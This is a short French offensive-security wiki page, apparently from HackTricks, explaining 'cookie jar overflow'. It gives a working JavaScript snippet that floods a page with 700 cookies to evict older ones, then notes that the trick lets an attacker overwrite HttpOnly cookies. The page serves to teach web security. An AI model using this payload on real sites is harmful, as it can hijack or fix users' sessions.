{{#include ../../banners/hacktricks-training.md}}

Les navigateurs ont une **limite sur le nombre de cookies** qu'ils peuvent stocker pour une page. Ensuite, si pour une raison quelconque vous devez **faire disparaître un cookie**, vous pouvez **déborder le pot à cookies** car les plus anciens seront supprimés en premier :
```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```
Remarquez que les cookies tierces pointant vers un domaine différent ne seront pas écrasées.

> [!CAUTION]
> Cette attaque peut également être utilisée pour **écraser les cookies HttpOnly car vous pouvez les supprimer puis les réinitialiser avec la valeur que vous souhaitez**.
>
> Vérifiez cela dans [**ce post avec un laboratoire**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).

{{#include ../../banners/hacktricks-training.md}}